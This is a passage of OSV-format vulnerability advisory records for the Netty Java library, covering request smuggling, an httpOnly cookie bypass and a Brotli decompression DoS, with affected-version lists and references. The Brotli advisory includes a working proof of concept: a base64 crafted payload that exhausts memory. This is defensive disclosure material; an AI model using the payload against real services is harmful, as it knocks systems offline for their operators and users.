"2021-03-09T19:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wx5j-54mm-rqqq", "published": "2021-12-09T19:09:17Z", "modified": "2024-02-22T05:37:31.471154Z", "aliases": [ "CVE-2021-43797" ], "related": [ "CGA-2vx5-qv6g-67jq", "CGA-qxv3-xxff-qffv", "CVE-2021-43797" ], "summary": "HTTP request smuggling in netty", "details": "### Impact\n\nNetty currently just skips control chars when these are present at the beginning / end of the header name. We should better fail fast as these are not allowed by the spec and could lead to HTTP request smuggling.\n\nFailing to do the validation might cause netty to \"sanitize\" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore and so not do the validation itself.\n\n", "affected": [ { "package": { "name": "io.netty:netty-codec-http", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.71.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-wx5j-54mm-rqqq/GHSA-wx5j-54mm-rqqq.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-wx5j-54mm-rqqq/GHSA-wx5j-54mm-rqqq.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-wx5j-54mm-rqqq/GHSA-wx5j-54mm-rqqq.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-wx5j-54mm-rqqq" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43797" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/11891" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/07aa6b5938a8b6ed7a6586e066400e2643897323" }, { "type": "WEB", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220107-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2021-12-09T18:17:28Z", "nvd_published_at": "2021-12-09T19:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xfv3-rrfm-f2rv", "published": "2020-06-30T21:01:21Z", "modified": "2024-02-16T08:04:08.954640Z", "aliases": [ "CVE-2015-2156" ], "summary": "Information Exposure in Netty", "details": "Netty before 3.9.8.Final, 3.10.x before 3.10.3.Final, 4.0.x before 4.0.28.Final, and 4.1.x before 4.1.0.Beta5 and Play Framework 2.x before 2.3.9 might allow remote attackers to bypass the httpOnly flag on cookies and obtain sensitive information by leveraging improper validation of cookie name and value characters.", "affected": [ { "package": { "name": "io.netty:netty-parent", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.0.28.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.3.Final", "4.0.4.Final", "4.0.5.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.8.Final" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.10.0" }, { "fixed": "3.10.3.Final" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.10.0" }, { "fixed": "3.10.3.Final" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.8.Final" } ] } ], "versions": [ "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-xfv3-rrfm-f2rv/GHSA-xfv3-rrfm-f2rv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2156" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/3748/commits/4ac519f534493bb0ca7a77e1c779138a54faa7b9" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/3754" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/2caa38a2795fe1f1ae6ceda4d69e826ed7c55e55" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/31815598a2af37f0b71ea94eada70d6659c23752" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1222923" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a19bb1003b0d6cd22475ba83c019b4fc7facfef2a9e13f71132529d3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/dc1275aef115bda172851a231c76c0932d973f9ffd8bc375c4aba769@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-IONETTY-73571" }, { "type": "WEB", "url": "https://www.playframework.com/security/vulnerability/CVE-2015-2156-HttpOnlyBypass" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159379.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-May/159166.html" }, { "type": "WEB", "url": "http://netty.io/news/2015/05/08/3-9-8-Final-and-3.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/05/17/1" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/74704" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-30T20:59:55Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3p8m-j85q-pgmj", "published": "2025-09-03T18:00:55Z", "modified": "2025-09-04T14:30:07.795314Z", "aliases": [ "CVE-2025-58057" ], "related": [ "CGA-2q6x-j784-7h79", "CGA-2v4w-pr95-p9mq", "CGA-2xm9-r734-f5jh", "CGA-37rw-3rg8-5p2r", "CGA-48jf-6j23-46j3", "CGA-4f95-7j4w-9wc7", "CGA-553w-99qm-q83c", "CGA-5hhq-wjmg-gcjp", "CGA-6hmq-qr85-3xh8", "CGA-7546-ph65-xxxw", "CGA-7j2f-rgqc-qr3w", "CGA-7v5c-p2r6-p462", "CGA-829h-3xf3-j2qf", "CGA-83vx-rwv3-3fvr", "CGA-85wm-6c4p-5865", "CGA-8635-mm2p-7mfj", "CGA-875r-5r79-249x", "CGA-8gfq-pqwq-pv7h", "CGA-8jcq-2484-6w9x", "CGA-8x49-65rf-mc5q", "CGA-929v-xcpg-57wc", "CGA-948x-68h4-f2cj", "CGA-94cj-4rxx-5cfm", "CGA-9jgq-4qx7-v856", "CGA-9vh6-4325-2mgm", "CGA-c3rv-cp45-mhjr", "CGA-c885-5849-wwc2", "CGA-cfw2-ff39-v6rm", "CGA-cgr7-w7ff-wqcq", "CGA-g8vf-gjcg-2fgc", "CGA-gmwh-588r-7f2g", "CGA-gxhv-xr39-w63r", "CGA-h5j9-46vj-f522", "CGA-j3fg-43p4-p7h8", "CGA-j9xh-qf5r-6hr3", "CGA-jm8f-rrgp-45fp", "CGA-jpqm-5jrf-pxjm", "CGA-mq82-fgj6-fhmc", "CGA-p9pq-pmp9-8835", "CGA-pg9f-mw8h-mhvp", "CGA-ppc8-78x8-3698", "CGA-pprc-vhvh-79j3", "CGA-qw7c-p95f-xfgp", "CGA-r324-x764-h722", "CGA-r6gh-cvx2-8mqg", "CGA-rq57-8qrx-9frv", "CGA-v923-59cp-2r6q", "CGA-w9vw-4jr4-m4qp", "CGA-wfq9-4352-93hp", "CGA-xghx-54mj-627g" ], "summary": "Netty's decoders vulnerable to DoS via zip bomb style attack", "details": "### Summary\n\nWith specially crafted input, `BrotliDecoder` and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.\n\n### Details\n\n`BrotliDecoder.decompress` has no limit in how often it calls `pull`, decompressing data 64K bytes at a time. The buffers are saved in the output list, and remain reachable until OOM is hit. This is basically a zip bomb.\n\nTested on 4.1.118, but there were no changes to the decoder since.\n\n### PoC\n\nRun this test case with `-Xmx1G`:\n\n```java\nimport io.netty.buffer.Unpooled;\nimport io.netty.channel.embedded.EmbeddedChannel;\n\nimport java.util.Base64;\n\npublic class T {\n public static void main(String[] args) {\n EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());\n channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode(\"aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=\")));\n }\n}\n```\n\nError:\n\n```\nException in thread \"main\" java.lang.OutOfMemoryError: Cannot reserve 4194304 bytes of direct buffer memory (allocated: 1069580289, limit: 1073741824)\n\tat java.base/java.nio.Bits.reserveMemory(Bits.java:178)\n\tat java.base/java.nio.DirectByteBuffer.\u003cinit\u003e(DirectByteBuffer.java:121)\n\tat java.base/java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:332)\n\tat io.netty.buffer.PoolArena$DirectArena.allocateDirect(PoolArena.java:718)\n\tat io.netty.buffer.PoolArena$DirectArena.newChunk(PoolArena.java:693)\n\tat io.netty.buffer.PoolArena.allocateNormal(PoolArena.java:213)\n\tat io.netty.buffer.PoolArena.tcacheAllocateNormal(PoolArena.java:195)\n\tat io.netty.buffer.PoolArena.allocate(PoolArena.java:137)\n\tat io.netty.buffer.PoolArena.allocate(PoolArena.java:127)\n\tat io.netty.buffer.PooledByteBufAllocator.newDirectBuffer(PooledByteBufAllocator.java:403)\n\tat io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:188)\n\tat io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:179)\n\tat io.netty.buffer.AbstractByteBufAllocator.buffer(AbstractByteBufAllocator.java:116)\n\tat io.netty.handler.codec.compression.BrotliDecoder.pull(BrotliDecoder.java:70)\n\tat io.netty.handler.codec.compression.BrotliDecoder.decompress(BrotliDecoder.java:101)\n\tat io.netty.handler.codec.compression.BrotliDecoder.decode(BrotliDecoder.java:137)\n\tat io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:530)\n\tat io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:469)\n\tat io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:290)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)\n\tat io.netty.channel.embedded.EmbeddedChannel.writeInbound(EmbeddedChannel.java:348)\n\tat io.netty.handler.codec.compression.T.main(T.java:11)\n```\n\n### Impact\n\nDoS for anyone using `BrotliDecoder` on untrusted input.", "affected": [ { "package": { "name": "io.netty:netty-codec-compression", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-compression" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.2.0.Alpha1" }, { "fixed": "4.2.5.Final" } ] } ], "versions": [ "4.2.0.Alpha3", "4.2.0.Alpha4", "4.2.0.Alpha5", "4.2.0.Beta1", "4.2.0.Final", "4.2.0.RC1", "4.2.0.RC2", "4.2.0.RC3", "4.2.0.RC4", "4.2.1.Final", "4.2.2.Final", "4.2.3.Final", "4.2.4.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-3p8m-j85q-pgmj/GHSA-3p8m-j85q-pgmj.json" } }, { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.125.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.100.Final", "4.1.101.Final", "4.1.102.Final", "4.1.103.Final", "4.1.104.Final", "4.1.105.Final", "4.1.106.Final", "4.1.107.Final", "4.1.108.Final", "4.1.109.Final", "4.1.11.Final", "4.1.110.Final", "4.1.111.Final", "4.1.112.Final", "4.1.113.Final", "4.1.114.Final", "4.1.115.Final", "4.1.116.Final", "4.1.117.Final", "4.1.118.Final", "4.1.119.Final", "4.1.12.Final", "4.1.120.Final", "4.1.121.Final", "4.1.122.Final", "4.1.123.Final", "4.1.124.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", 